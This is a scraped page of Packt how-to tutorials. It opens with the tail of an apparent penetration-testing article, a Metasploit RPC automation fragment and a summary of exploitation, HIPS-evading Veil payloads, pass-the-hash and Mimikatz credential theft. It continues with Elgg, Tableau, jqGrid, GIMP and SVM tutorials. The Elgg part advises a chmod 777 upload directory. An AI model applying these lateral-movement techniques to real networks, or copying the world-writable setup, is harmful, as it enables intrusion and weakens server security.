completed, the results are written in the specified output file. result = client.call('console.read',[console_id_int]) if len(result['data']) > 1: if result['busy'] == True: time.sleep(1) continue else: console_output = result['data'] e.write(console_output) if verbose > 0: print(console_output) done = True We close the file and destroy the console to clean up the work we had done. e.closed client.call('console.destroy',[console_id]) The final pieces of the script are related to setting up the arguments, setting up the constructors and calling the modules. These components are similar to previous scripts and have not been included here for the sake of space, but the details can be found at the previously mentioned location on GitHub. The last requirement is loading of the msgrpc at the msfconsole with the specific password that we want. So launch the msfconsole and then execute the following within it. load msgrpc Pass=msfrpcpassword The command was not mistyped, Metasploit has moved to msgrpc verses msfrpc, but everyone still refers to it as msfrpc. The big difference is the msgrpc library uses POST requests to send data while msfrpc used eXtensible Markup Language (XML). All of this can be automated with resource files to set up the service. Summary In this article, we highlighted a manner in which you can move through a sample environment. Specifically, how to exploit a relative box, escalate privileges, and extract additional credentials. From that position, we identified other viable hosts we could laterally move into and the users who were currently logged into them. We generated custom payloads with the Veil Framework to bypass HIPS, and executed a PtH attack. This allowed us to extract other credentials from memory with the tool Mimikatz. We then automated the identification of viable secondary targets and the users logged into them with Python and MSFRPC. Resources for Article: Further resources on this subject: Basics of Jupyter Notebook and Python[article] Scraping the Data[article] Modeling complex functions with artificial neural networks [article]

0
0
16067

How-To Tutorials

article-image-elgg-social-networking-installation

Packt

28 Oct 2009

14 min read

Elgg Social Networking - Installation

Packt

28 Oct 2009

14 min read

Installing Elgg In addition to its impressive feature list, Elgg is an admin's dolly. In this tutorial by Mayank Sharma, we will see how Elgg can be installed in popular Linux web application rollout stack of Linux, Apache, MySQL, and PHP, fondly referred to as LAMP. As MySQL and PHP can run under Windows operating system as well, you can set up Elgg to serve your purpose for such an environment. Setting Up LAMP Let's look at setting up the Linux, Apache, MySQL, PHP web server environment. There are several reasons for the LAMP stack's popularity. While most people enjoy the freedom offered by these Open Source software, small business and non-profits will also be impressed by its procurement cost—$0. Step 1: Install Linux The critical difference between setting up Elgg under Windows or Linux is installing the operating system. The Linux distribution I'm using to set up Elgg is Ubuntu Linux ( http://www.ubuntu.com/ ).It's available as a free download and has a huge and active global community, should you run into any problems. Covering step-by-step installation of Ubuntu Linux is too much of a digression for this tutorial. Despite the fact that Ubuntu isn't too difficult to install, because of its popularity there are tons of installation and usage documentation available all over the Web. Linux.com has a set of videos that detail the procedure of installing Ubuntu ( http://www.linux.com/articles/114152 ).Ubuntu has a dedicated help section ( https://help.ubuntu.com/ ) for introduction and general usage of the distribution. Step 2: Install Apache Apache is the most popular web server used on the Internet. Reams and reams of documents have been written on installing Apache under Linux. Apache's documentation sub-project ( http://httpd.apache.org/docs-project/ ) has information on installing various versions of Apache under Linux. Ubuntu, based on another popular Linux distribution, Debian, uses a very powerful and user-friendly packaging system. It's called apt-get and can install an Apache server within minutes. All you have to do is open a terminal and write this command telling apt-get what to install: apt-get install apache2 apache2-common apache2-doc apache2-mpm-prefork apache2-utils libapr0 libexpat1 ssl-cert This will download Apache and its most essential libraries. Next, you need to enable some of Apache's most critical modules: a2enmod ssla2enmod rewritea2enmod include The rewrite module is critical to Elgg, so make sure it's enabled, else Elgg wouldn't work properly. That's it. Now, just restart Apache with: /etc/init.d/apache2 restart. Step 3: MySQL Installing MySQL isn't too much of an issue either. Again, like Ubuntu and Apache, MySQL can also boast of a strong and dedicated community. This means there's no dearth of MySQL installation or usage related documentation ( http://www.mysql.org/doc/ ). If you're using MySQL under Ubuntu, like me, installation is just a matter of giving apt-get a set of packages to install: apt-get install mysql-server mysql-client libmysqlclient12-dev Finally, set up a password for MySQL with: mysqladmin -h yourserver.example.com -u root password yourrootmysqlpassword Step 4: Install PHP Support You might think I am exaggerating things a little bit here, but I am not, PHP is one of the most popular and easy to learn languages for writing web applications. Why do you think we are setting up out Linux web server environment to execute PHP? It's because Elgg itself is written in PHP! And so are hundreds and thousands of other web applications. So I'm sure you've guessed by now that PHP has a good deal of documentation ( http://www.php.net/docs.php )as well. You've also guessed it's now time to call upon Ubuntu's apt-get package manager to set up PHP: apt-get install libapache2-mod-php5 php5 php5-common php5-gd php5-mysql php5-mysqli As you can see, in addition to PHP, we are also installing packages that'll hook up PHP with the MySQL database and the Apache web server. That's all there is to setting up the LAMP architecture to power your Elgg network. Setting Up WAMP If you are used to Microsoft's Windows operating system or want to avoid the extra minor learning curve involved with setting up the web server on a Linux distribution, especially, if you haven't done it before, you can easily replicate the Apache, MySQL, PHP web server on a Windows machine. Cost wise, all server components the Apache web server, MySQL database, and the PHP development language have freely available Windows versions as well. But the base component of this stack, the operating system —Microsoft Windows, isn't. Versions of Apache, MySQL, and PHP for Windows are all available on the same websites mentioned above. As Windows doesn't have an apt-get kind of utility, you'll have to download and install all three components from their respective websites, but you have an easier way to set up a WAMP server. There are several pre-packaged Apache, MySQL, and PHP software bundles available for Windows(http://en.wikipedia.org/wiki/Comparison_of_WAMPs).I've successfully run Elgg on the WAMP5 bundle (http://www.en.wampserver.com/). The developer updates the bundle, time and again, to make sure it's running the latest versions of all server components included in the bundle. Note - While WAMP5 requires no configuration, make sure you have Apache's rewrite_module and PHP's php_gd2 extension enabled. They will have a bullet next to their name if they are enabled. If the bullet is missing, click on the respective entries under the Apache and PHP sub-categories and restart WAMP5. Installing Elgg Now that we have a platform ready for Elgg, let's move on to the most important step of setting up Elgg. Download the latest version of Elgg from its website. At the time of writing this tutorial, the latest version of Elgg was Elgg-0.8. Elgg is distributed as a zipped file. To uncompress under Linux: Move this zipped file to /tmp and uncompress it with the following command: $ unzip /tmp/elgg-0.8.zip To uncompress under Windows: Right-click on the ZIP file and select the Extract here option. After uncompressing the ZIP file, you should have a directory called Elgg-<version-number>, in my case, elgg-0.8/. This directory contains several sub directories and files. The INSTALL file contains detailed installation instructions. The first step is to move this uncompressed directory to your web server. Note: You can set up Elgg on your local web server that sits on the Internet or on a paid web server in a data center anywhere on the planet. The only difference between the two setups is that if you don't have access to the local web server, you'll have to contact the web service provider and ask him about the transfer options available to you. Most probably, you'll have FTP access to your web server, and you'll have to use one of the dozens of FTP clients, available for free, to transfer Elgg's files from your computer to the remote web server. Optionally, if you have "shell" access on the web server, you might want to save time by transferring just the zipped file and unzipping it on the web server itself. Contact your web server provider for this information. The web server's directory where you need to copy the contents of the Elgg directory depends upon your Apache installation and operating system. In Ubuntu Linux, the default web server directory is /var/www/. In Windows, WAMP5 asks where it should create this directory during installation. By default, it's the www directory and is created within the directory you installed WAMP5 under. Note: Another important decision you need to make while installing Elgg is how do you want your users to access your network. If you're setting up the network to be part of your existing web infrastructure, you'll need to install Elgg inside a directory. If, on the other hand, you are setting up a new site just for the Elgg-powered social network, copy the contents of the Elgg directory inside the www directory itself and not within a subdirectory. Once you have the Elgg directory within your web server's www directory, it's time to set things in motion. Start by renaming the config-dist.php file to config.php and the htaccess-dist to .htaccess. Simply right-click on the file and give it a new name or use the mv command in this format: $ mv <original-file-name> <new-file-name> Note : To rename htacces-dist to .htaccess in Windows, you'll have to open the htaccess-dist file in notepad and then go to File | Save As and specify the name as .htaccess with the quotes. Editing config.php Believe it or not, we've completed the "installation" bit of setting up Elgg. But we still need to configure it before throwing the doors open to visitors. Not surprisingly, all this involves is creating a database and editing the config.php file to our liking. Creating a Database Making an empty database in MySQL isn't difficult at all. Just enter the MySQL interactive shell using your username, password, and hostname you specified while installing MySQL. $ mysql -u root -h localhost -pEnter password: Welcome to the MySQL monitor. Commands end with ; or g.Your MySQL connection id is 9 to server version: 5.0.22-Debian_0ubuntu6.06.3-logType 'help;' or 'h' for help. Type 'c' to clear the buffer.mysql> CREATE DATABASE elgg; You can also create a MySQL database using a graphical front-end manager like PHPMyAdmin, which comes with WAMP5. Just look for a database field, enter a new name (Elgg), and hit the Create button to create an empty Elgg database. Initial Configuration Elgg has a front-end interface to set up config.php, but there are a couple of things you need to do before you can use that interface: Create a data directory outside your web server root. As described in the configuration file, this is a special directory where uploaded files will go. It's also advisable to create this directory outside your main Elgg install. This is because this directory will be writable by everyone accessing the Elgg site and having such a "world-accessible" directory under your Elgg installation is a security risk. If you call the directory Elgg-data, make it world-readable with the following command: $ chmod 777 elgg-data Setup admin username and password. Before you can access Elgg's configuration web front-end, you need an admin user and a password. For that open the config.php file in your favorite text editor and scroll down to the following variables: $CFG->adminuser = "";$CFG->adminpassword = ""; Specify your chosen admin username and password between the quotes, so that it looks something like this: $CFG->adminuser = "admin";$CFG->adminpassword = "765thyr3"; Make sure you don't forget the username and password of the admin user. Important Settings When you have created the data directory and specified an admin username and password, it's time to go ahead with the rest of the configuration. Open a web browser and point to http://<your-web-server>/<Elgg-installation>/elggadmin/ This will open up a simple web page with lots of fields. All fields have a title and a brief description of the kind of information you need to fill in that field. There are some drop-down lists as well, from which you have to select one of the listed options. Here are all the options and their descriptions: Administration panel username: Username to log in to this admin panel, in future, to change your settings. Admin password: Password to log in to this admin panel in future. Site name: Enter the name of your site here (e.g. Elgg, Apcala, University of Bogton's Social Network, etc.). Tagline: A tagline for your site (e.g. Social network for Bogton). Web root: External URL to the site (e.g. http://elgg.bogton.edu/). Elgg install root: Physical path to the files (e.g./home/Elggserver/httpdocs/). Elgg data root: This is a special directory where uploaded files will go. If possible, this should live outside your main Elgg installation? (you'll need to create it by hand). It must have world writable permissions set, and have a final slash at the end. Note: Even in Windows, where we use back slashes () to separate directories, use Unix's forward slashes (/) to specify the path to the install root, data root, and other path names. For example, if you have Elgg files under WAMP's default directory in your C drive, use this path: C:/wamp/www/elgg/. Database type: Acceptable values are mysql and postgres - MySQL is highly recommended. System administrator email: The email address your site will send emails from(e.g. elgg-admin@bogton.edu). News account initial password: The initial password for the 'news' account. This will be the first administrator user within your system, and you should change the password immediately after the first time you log in. Default locale: Country code to set language to if you have gettext installed. Public registration: Can general members of the public register for this system? Public invitations: Can users of this system invite other users? Maximum users: The maximum number of users in your system. If you set this to 0, you will have an unlimited number of users. Maximum disk space: The maximum disk space taken up by all uploaded files. Disable public comments: Set the following to true to force users to log in before they can post comments, overriding the per-user option. This is a handy sledgehammer-to-crack-a-nut tactic to protect against comment spam (although an Akismet plug-in is available from elgg.org). Email filter: Anything you enter here must be present in the email address of anyone who registers; e.g. @mycompany.com will only allow email address from mycompany.com to register. Default access: The default access level for all new items in the system. Disable user templates: If this is set, users can only choose from available templates rather than defining their own. Persistent connections: Should Elgg use persistent database connections? Debug: Set this to 2047 to get ADOdb error handling. RSS posts maximum age: Number of days for which to keep incoming RSS feed entries before deleting them. Set this to 0 if you don't want RSS posts to be removed. Community create flag: Set this to admin if you would like to restrict the ability to create communities to admin users. cURL path: Set this to the cURL executable if cURL is installed; otherwise leave blank. Note : According to Wikipedia, cURL is a command line tool for transferring files with URL syntax, supporting FTP, FTPS, HTTP, HTTPS, TFTP, SCP,SFTP, Telnet, DICT, FILE, and LDAP. The main purpose and use for cURL is to automate unattended file transfers or sequences of operations. For example, it is a good tool for simulating a user's actions at a web browser. Under Ubuntu Linux, you can install curl using the following command: apt-get install curl Templates location: The full path of your Default_Template directory. Profile location: The full path to your profile configuration file (usually, it's best to leave this in mod/profile/). Finally, when you're done, click on the Save button to save the settings. Note : The next version of Elgg, Elgg 0.9, will further simplify installation. Already an early release candidate of this version (elgg-0.9rc1) is a lot more straightforward to install and configure, for initial use. First Log In Now, it's time to let Elgg use these settings and set things up for you. Just point your browser to your main Elgg installation (http://<your-web-servergt;/<Elgg-installation>). It'll connect to the MySQL database and create some tables, then upload some basic data, before taking you to the main page. On the main page, you can use the news account and the password you specified for this account during configuration to log in to your Elgg installation.

0
0
16066

How-To Tutorials

article-image-hands-on-table-calculation-techniques-with-tableau

Amarabha Banerjee

14 Feb 2018

4 min read

Hands on Table Calculation Techniques with Tableau

Amarabha Banerjee

14 Feb 2018

4 min read

[box type="note" align="" class="" width=""]This article is a book excerpt from the title Mastering Tableau written by David Baldwin. This book will help you master the intricacies of Tableau to create effective data visualizations.[/box] Today, we shall explore Table Calculation Techniques with Tableau and explore a real world example of using these techniques. In this article, we provide a simple schema for understanding table calculations. This schema is communicated via two questions: What is the function? How is the function applied? These two questions are inexorably connected. You cannot reliably apply something until you know what it is. And you cannot get useful results from something until you correctly apply it. The sections below will help you to get a head start into Table calculation techniques and how to use Tableau functions effectively for implementing Table calculation. Basics of Table Calculation Calculated fields can be categorized as: row level, aggregate level, and table level. For row- and aggregate-level calculations, the underlying data source engine does most (if not all) of the computational work, and Tableau merely visualizes the results. For table calculations, Tableau also relies on the underlying data source engine to execute computational tasks; however, after that work is completed and a dataset is returned, Tableau performs additional processing before rendering the results. This can be seen within the following process flow diagram, in the circled part titled Tableau performs additional processing. This is where table calculations are processed. We will continue with a definition: A table calculation is a function performed on a dataset in cache that has been generated as a result of a query from Tableau to the data source. Let's consider a couple of points regarding the dataset in cache mentioned in the preceding definition. First, it is important to understand that this cache is not simply the returned results of a query. Tableau may adjust the returned results. For example,, Tableau may expand the cache via data densification. Secondly, it's important to consider how the cache is structured. Basically, the dataset in cache is a table and, like all tables, is made up of rows and columns. This is particularly important for table calculations since a table calculation may be computed as it moves along the cache. Such a table calculation is directional. Alternatively, a table calculation may be computed based on the entire cache with no directional consideration. Table calculations such as this are non-directional. Directional and nondirectional table calculations will be considered more fully in the following section. Directional and non-directional table calculation functions As of Tableau 10, there are 32 table calculation functions in Tableau. However, many of these are simply variations of a theme; for example, there are five Running functions, including RUNNING_SUM and RUNNING_AVG. If we narrow our consideration to unique groups of table calculations functions, we will discover that there are only 11. The following table shows these 11 functions organized in two categories: As mentioned previously, non-directional table calculation functions operate on the entire cache and thus are not computed based on movement through the cache. For example, the SIZE function doesn't change based on the value of a previous row in the cache. On the other hand, RUNNING_SUM does change based on previous rows in the cache and is therefore considered directional. Practical Example In this example, we'll see directional and non-directional table calculation functions in action: Navigate to h t t p s ://p u b l i c . t a b l e a u . c o m /p r o f i l e /d a v i d 1. . b a l d w i n #!/ to locate and download the workbook associated with this chapter. Navigate to the worksheet entitled Directional/Non-Directional. Create the following calculated fields: Place Category and Ship Mode on the Rows shelf. Double-click on Sales, Lookup, Size, Window Sum, Window Sum w/Start&End, and Running Sum to populate the view. Compare the following screenshot with the notes in step 3 of this exercise for better understanding: We discussed techniques for implementing table calculations with Tableau. If you liked our post, be sure to check out Mastering Tableau which consists of other useful data visualization and data analysis techniques.

0
0
16059

article-image-implementing-ajax-grid-using-jquery-data-grid-plugin-jqgrid

Packt

05 Feb 2010

9 min read

Implementing AJAX Grid using jQuery data grid plugin jqGrid

Packt

05 Feb 2010

9 min read

In this article by Audra Hendrix, Bogdan Brinzarea and Cristian Darie, authors of AJAX and PHP: Building Modern Web Applications 2nd Edition, we will discuss the usage of an AJAX-enabled data grid plugin, jqGrid. One of the most common ways to render data is in the form of a data grid. Grids are used for a wide range of tasks from displaying address books to controlling inventories and logistics management. Because centralizing data in repositories has multiple advantages for organizations, it wasn't long before a large number of applications were being built to manage data through the Internet and intranet applications by using data grids. But compared to their desktop cousins, online applications using data grids were less than stellar - they felt cumbersome and time consuming, were not always the easiest things to implement (especially when you had to control varying access levels across multiple servers), and from a usability standpoint, time lags during page reloads, sorts, and edits made online data grids a bit of a pain to use, not to mention the resources that all of this consumed. As you are a clever reader, you have undoubtedly surmised that you can use AJAX to update the grid content; we are about to show you how to do it! Your grids can update without refreshing the page, cache data for manipulation on the client (rather than asking the server to do it over and over again), and change their looks with just a few keystrokes! Gone forever are the blinking pages of partial data and sessions that time out just before you finish your edits. Enjoy! In this article, we're going to use a jQuery data grid plugin named jqGrid. jqGrid is freely available for private and commercial use (although your support is appreciated) and can be found at: http://www.trirand.com/blog/. You may have guessed that we'll be using PHP on the server side but jqGrid can be used with any of the several server-side technologies. On the client side, the grid is implemented using JavaScript's jQuery library and JSON. The look and style of the data grid will be controlled via CSS using themes, which make changing the appearance of your grid easy and very fast. Let's start looking at the plugin and how easily your newly acquired AJAX skills enable you to quickly add functionality to any website. Our finished grid will look like the one in Figure 9-1: Figure 9-1: AJAX Grid using jQuery Let's take a look at the code for the grid and get started building it. Implementing the AJAX data grid The files and folders for this project can be obtained directly from the code download(chap:9) for this article, or can be created by typing them in. We encourage you to use the code download to save time and for accuracy. If you choose to do so, there are just a few steps you need to follow: Copy the grid folder from the code download to your ajax folder. Connect to your ajax database and execute the product.sql script. Update config.php with the correct database username and password. Load http://localhost/ajax/grid to verify the grid works fine - it should look just like Figure 9-1. You can test the editing feature by clicking on a row, making changes, and hitting the Enter key. Figure 9-2 shows a row in editing mode: Figure 9-2: Editing a row Code overview If you prefer to type the code yourself, you'll find a complete step-by-step exercise a bit later in this article. Before then, though, let's quickly review what our grid is made of. We'll review the code in greater detail at the end of this article. The editable grid feature is made up of a few components: product.sql is the script that creates the grid database config.php and error_handler.php are our standard helper scripts grid.php and grid.class.php make up the server-side functionality index.html contains the client-side part of our project The scripts folder contains the jQuery scripts that we use in index.html Figure 9-3: The components of the AJAX grid The database Our editable grid displays a fictional database with products. On the server side, we store the data in a table named product, which contains the following fields: product_id: A unique number automatically generated by auto-increment in the database and used as the Primary Key name: The actual name of the product price: The price of the product for sale on_promotion: A numeric field that we use to store 0/1 (or true/false) values. In the user interface, the value is expressed via a checkbox The Primary Key is defined as the product_id, as this will be unique for each product it is a logical choice. This field cannot be empty and is set to auto-increment as entries are added to the database: CREATE TABLE product( product_id INT UNSIGNED NOT NULL AUTO_INCREMENT, name VARCHAR(50) NOT NULL DEFAULT '', price DECIMAL(10,2) NOT NULL DEFAULT '0.00', on_promotion TINYINT NOT NULL DEFAULT '0', PRIMARY KEY (product_id)); The other fields are rather self-explanatory—none of the fields may be left empty and each field, with the exception of product_id, has been assigned a default value. The tinyint field will be shown as a checkbox in our grid that the user can simply set on or off. The on-promotion field is set to tinyint, as it will only need to hold a true (1) or false (0) value. Styles and colors Leaving the database aside, it's useful to look at the more pertinent and immediate aspects of the application code so as to get a general overview of what's going on here. We mentioned earlier that control of the look of the grid is accomplished through CSS. Looking at the index.html file's head region, we find the following code: <link rel="stylesheet" type="text/css" href="scripts/themes/coffee/grid.css" title="coffee" media="screen" /><link rel="stylesheet" type="text/css" media="screen" href="themes/jqModal.css" /> Several themes have been included in the themes folder; coffee is the theme being used in the code above. To change the look of the grid, you need only modify the theme name to another theme, green, for example, to modify the color theme for the entire grid. Creating a custom theme is possible by creating your own images for the grid (following the naming convention of images), collecting them in a folder under the themes folder, and changing this line to reflect your new theme name. There is one exception here though, and it affects which buttons will be used. The buttons' appearance is controlled by imgpath: 'scripts/themes/green/images', found in index.html; you must alter this to reflect the path to the proper theme. Changing the theme name in two different places is error prone and we should do this carefully. By using jQuery and a nifty trick, we will be able to define the theme as a simple variable. We will be able to dynamically load the CSS file based on the current theme and imgpath will also be composed dynamically. The nifty trick involves dynamically creating the < link > tag inside head and setting the appropriate href attribute to the chosen theme. Changing the current theme simply consists of changing the theme JavaScript variable. JqModal.css controls the style of our pop-up or overlay window and is a part of the jqModal plugin. (Its functionality is controlled by the file jqModal.js found in the scripts/js folder.) You can find the plugin and its associated CSS file at: http://dev.iceburg.net/jquery/jqModal/ In addition, in the head region of index.html, there are several script src declarations for the files used to build the grid (and jqModal.js for the overlay): <script src="scripts/jquery-1.3.2.js" type="text/javascript"></script><script src="scripts/jquery.jqGrid.js" type="text/javascript"></script><script src="scripts/js/jqModal.js" type="text/javascript"></script><script src="scripts/js/jqDnR.js" type="text/javascript"></script> There are a number of files that are used to make our grid function and we will talk about these scripts in more detail later. Looking at the body of our index page, we find the declaration of the table that will house our grid and the code for getting the grid on the page and populated with our product data. <script type="text/javascript">var lastSelectedId;$('#list').jqGrid({ url:'grid.php', //name of our server side script. datatype: 'json', mtype: 'POST', //specifies whether using post or get//define columns grid should expect to use (table columns) colNames:['ID','Name', 'Price', 'Promotion'], //define data of each column and is data editable? colModel:[ {name:'product_id',index:'product_id', width:55,editable:false}, //text data that is editable gets defined {name:'name',index:'name', width:100,editable:true, edittype:'text',editoptions:{size:30,maxlength:50}},//editable currency {name:'price',index:'price', width:80, align:'right',formatter:'currency', editable:true},// T/F checkbox for on_promotion {name:'on_promotion',index:'on_promotion', width:80, formatter:'checkbox',editable:true, edittype:'checkbox'} ],//define how pages are displayed and paged rowNum:10, rowList:[5,10,20,30], imgpath: 'scripts/themes/green/images', pager: $('#pager'), sortname: 'product_id',//initially sorted on product_id viewrecords: true, sortorder: "desc", caption:"JSON Example", width:600, height:250, //what will we display based on if row is selected onSelectRow: function(id){ if(id && id!==lastSelectedId){ $('#list').restoreRow(lastSelectedId); $('#list').editRow(id,true,null,onSaveSuccess); lastSelectedId=id; } },//what to call for saving edits editurl:'grid.php?action=save'});//indicate if/when save was successfulfunction onSaveSuccess(xhr){ response = xhr.responseText; if(response == 1) return true; return false;}</script>

0
0
16054

How-To Tutorials

article-image-getting-started-android-things

Packt

21 Jul 2017

16 min read

Getting Started with Android Things

Packt

21 Jul 2017

16 min read

0
0
16037

Packt

06 Apr 2011

3 min read

Creating a quick logo for a company with GIMP 2.6

Packt

06 Apr 2011

3 min read

How to do it... We can go about creating our logo by carrying out the following steps: In a new file, using the Text Tool, write the name of the company. Pick a font, its size, and place it a little above the middle of the canvas. Lock the layer by selecting it and clicking in the Lock checkbox to avoid accidentally making changes to it: Create a new gradient by clicking on the + button at the bottom of the Gradients dialog. If it is not enabled, call it by using Ctrl + G, or go to Windows | Dockable Dialogs | Gradients: To pick the colors for the gradient, position the mouse over the the orange bar (blue in Windows) and right-click: Select the Left Endpoint's Color: And/or the Right Endpoint's Color: Here are the colors I have chosen: Using the Blend Tool, apply the gradient: Right-click inside the text layer name in the Layers dialog, and select the Alpha to Selection option: Then, go to Select | Grow, and make it bigger by 3 pixels: Create a new layer and name it border. Fill it using the Bucket Fill Tool (I used a dark color), and place it underneath the text layer (drag and drop the border layer): Duplicate the border layer by clicking on the Duplicate button at the bottom of the layers dialog, or going to Layer | Duplicate Layer. Repeat this operation with the text layer. Move this last duplicated layer on top of the border copy layer. Merge these duplicated layers by going to Layer | Merge Down, and change its name to reflection: Choose Select | none from the menu to be sure there's no selection present. Using the Move Tool, place the reflection layer below the "text" layer and flip it with the Flip Tool. Use the Move Tool to adjust the position of the flipped text, and separate them vertically by just a few pixels. Right-click in the reflection layer inside the Layers dialog, and select the Add Layer Mask option. Choose the Black (Full Transparency) and click Add. Using the Blend Tool, pick the FG to BG gradient from the Gradients Dialog, and apply it from bottom to the top to create a semitransparent reflection of the text: Select the original text layer. Right-click on it in the Layers dialog, and choose Alpha to Selection. Then with the Ellipse Select Tool in subtract mode (check the following image): Draw an ellipse, as in the following image: Create a new layer and name it glass. Then, fill it with a white color using the Bucket Fill Tool: Change its opacity to something around 30 and you are done! Here's the final logo: How it works... Just by using a font you like and a few tools you quickly created a logo. See how we only used default paint/blend tools and masks to create it? GIMP has powerful extensions but you can also create professional pieces without using complex filters or even using much time. Summary This article showed us how to use a few filters to create a company logo. Further resources on this subject: Photo Manipulation with GIMP 2.6 [Article] How To Create Amazing Text and Font Effects in Gimp 2.6 [Article] Creating Pseudo-3D Imagery with GIMP [Article] Blender 2.5: Creating a UV Texture [Article] Python Graphics: Combining Raster and Vector Pictures [Article] Open Source Awards 2010: Gimp [Article]

0
0
16015

How-To Tutorials

article-image-shipping-and-tax-calculations-php-5-ecommerce

Packt

20 Jan 2010

8 min read

Shipping and Tax Calculations with PHP 5 Ecommerce

Packt

20 Jan 2010

8 min read

0
0
16015

article-image-grunt-makes-it-easy-to-test-and-optimize-your-website-heres-how-tutorial

Sugandha Lahoti

18 Jun 2018

17 min read

Grunt makes it easy to test and optimize your website. Here's how. [Tutorial]

Sugandha Lahoti

18 Jun 2018

17 min read

0
0
16014

How-To Tutorials

article-image-support-vector-machines-classification-engine

Packt

17 Mar 2016

9 min read

Support Vector Machines as a Classification Engine

Packt

17 Mar 2016

9 min read

In this article by Tomasz Drabas, author of the book, Practical Data Analysis Cookbook, we will discuss on how Support Vector Machine models can be used as a classification engine. (For more resources related to this topic, see here.) Support Vector Machines Support Vector Machines (SVMs) are a family of extremely powerful models that can be used in classification and regression problems. They aim at finding decision boundaries that separate observations with differing class memberships. While many classifiers exist that can classify linearly separable data (for example, logistic regression), SVMs can handle highly non-linear problems using a kernel trick that implicitly maps the input vectors to higher-dimensional feature spaces. The transformation rearranges the dataset in such a way that it is then linearly solvable. The mechanics of the machine Given a set of n points of a form (x1,y1)...(xn,yn), where xi is a z-dimensional input vector and yi is a class label, the SVM aims at finding the maximum margin hyperplane that separates the data points: In a two-dimensional dataset, with linearly separable data points (as shown in the preceding figure), the maximum margin hyperplane would be a line that would maximize the distance between each of the classes. The hyperplane could be expressed as a dot product of the set of input vectors x and a vector normal to the hyperplane W:W.X=b, where b is the offset from the origin of the coordinate system. To find the hyperplane, we solve the following optimization problem: The constraint of our optimization problem effectively states that no point can cross the hyperplane if it does not belong to the class on that side of the hyperplane. Linear SVM Building a linear SVM classifier in Python is easy. There are multiple Python packages that can estimate a linear SVM but here, we decided to use MLPY (http://mlpy.sourceforge.net): import pandas as pd import numpy as np import mlpy as ml First, we load the necessary modules that we will use later, namely pandas (http://pandas.pydata.org), NumPy (http://www.numpy.org), and the aforementioned MLPY. We use pandas to read the data (https://github.com/drabastomek/practicalDataAnalysisCookbook repository to download the data): # the file name of the dataset r_filename = 'Data/Chapter03/bank_contacts.csv' # read the data csv_read = pd.read_csv(r_filename) The dataset that we use was described in S. Moro, P. Cortez, and P. Rita. A data-driven approach to Predict the Success of Bank Telemarketing. Decision Support Systems, Elsevier, 62:22-31, June 2014 and found here http://archive.ics.uci.edu/ml/datasets/Bank+Marketing. It consists of over 41.1k outbound marketing calls of a bank. Our aim is to classify these calls into two buckets: those that resulted in a credit application and those that did not. Once the file was loaded, we split the data into training and testing datasets; we also keep the input and class indicator data separately. To this end, we use the split_dataset(...) method: def split_data(data, y, x = 'All', test_size = 0.33): ''' Method to split the data into training and testing ''' import sys # dependent variable variables = {'y': y} # and all the independent if x == 'All': allColumns = list(data.columns) allColumns.remove(y) variables['x'] = allColumns else: if type(x) != list: print('The x parameter has to be a list...') sys.exit(1) else: variables['x'] = x # create a variable to flag the training sample data['train'] = np.random.rand(len(data)) < (1 - test_size) # split the data into training and testing train_x = data[data.train] [variables['x']] train_y = data[data.train] [variables['y']] test_x = data[~data.train][variables['x']] test_y = data[~data.train][variables['y']] return train_x, train_y, test_x, test_y, variables['x'] We randomly set 1/3 of the dataset aside for testing purposes and use the remaining 2/3 for the training of the model: # split the data into training and testing train_x, train_y, test_x, test_y, labels = hlp.split_data( csv_read, y = 'credit_application' ) Once we read the data and split it into training and testing datasets, we can estimate the model: # create the classifier object svm = ml.LibSvm(svm_type='c_svc', kernel_type='linear', C=100.0) # fit the data svm.learn(train_x,train_y) The svm_type parameter of the .LibSvm(...) method controls what algorithm to use to estimate the SVM. Here, we use the c_svc method—a C-support Vector Classifier. The method specifies how much you want to avoid misclassifying observations: the larger values of C parameter will shrink the margin for the hyperplane (theb) so that more of the observations are correctly classified. You can also specify nu_svc with a nu parameter that controls how much of your sample (at most) can be misclassified and how many of your observations (at least) can become support vectors. Here, we estimate an SVM with a linear kernel, so let's talk about kernels. Kernels A kernel function K is effectively a function that computes a dot product between two n-dimensional vectors, K: Rn.Rn --> R. In other words, the kernel function takes two vectors and produces a scalar: The linear kernel does not effectively transform the data into a higher dimensional space. This is not true for polynomial or Radial Basis Function (RBF) kernels that transform the input feature space into higher dimensions. In case of the polynomial kernel of degree d, the obtained feature space has (n+d/d) dimensions for the Rn dimensional input feature space. As you can see, the number of additional dimensions can grow very quickly and this would pose significant problems in estimating the model if we would explicitly transform the data into higher dimensions. Thankfully, we do not have to do this as that's where the kernel trick comes into play. The truth is that SVMs do not have to work explicitly in higher dimensions but can rather implicitly map the data to higher dimensions using pairwise inner products (instead of an explicit dot product) and then use it to find the maximum margin hyperplane. You can find a really good explanation of the kernel trick at http://www.eric-kim.net/eric-kim-net/posts/1/kernel_trick.html. Back to our example The .learn(...) method of the .LibSvm(...) object estimates the model. Once the model is estimated, we can test how well it performs. First, we use the estimated model to predict the classes for the observations in the testing dataset: predicted_l = svm.pred(test_x) Next, we will use some of the scikit-learn methods to print the basic statistics for our model: def printModelSummary(actual, predicted): ''' Method to print out model summaries ''' import sklearn.metrics as mt print('Overall accuracy of the model is {0:.2f} percent' .format( (actual == predicted).sum() / len(actual) * 100)) print('Classification report: n', mt.classification_report(actual, predicted)) print('Confusion matrix: n', mt.confusion_matrix(actual, predicted)) print('ROC: ', mt.roc_auc_score(actual, predicted)) First, we calculate the overall accuracy of the model expressed as a ratio of properly classified observations to the total number of observations in the testing sample. Next, we print the classification report: The precision is the model's ability to avoid classifying an observation as positive when it is not. It is a ratio of true positives to the overall number of positively classified records. The overall precision score is a weighted average of the individual precision scores where the weight is the support. The support is the total number of actual observations in each class. The total precision for our model is not too bad—89 out of 100. However, when we look at the precision to classify the true positives, the situation is not as good—only 63 out of 100 were properly classified. Recall can be viewed as the model's capacity to find all the positive samples. It is a ratio of true positives to the sum of true positives and false negatives. The recall for the class 0.0 is almost perfect but for class 1.0, it looks really bad. This might be a problem with the fact that our sample is not balanced, but it is more likely that the features we use to classify the data do not really capture the differences between the two groups. The f1-score is effectively a weighted amalgam of the precision and recall: it is a ratio of twice the product of precision and recall to their sum. In one measure, it shows whether the model performs well or not. At the general level, the model does not perform badly but when looked at the model's ability to classify the true signal, it fails gravely. It is a perfect example why judging the model at the general level might be misleading when dealing with samples that are heavily unbalanced. RBF kernel SVM Given that the linear kernel performed poorly, our dataset might not be linearly separable. Thus, let's try the RBF kernel. The RBF kernel is given as K(x,y)=e ||x-y||2/2a2, where ||x-y||2 is a Euclidean distance between the two vectors, x and y, and σ is a free parameter. The value of RBF equals to 1 when x=y and gradually falls 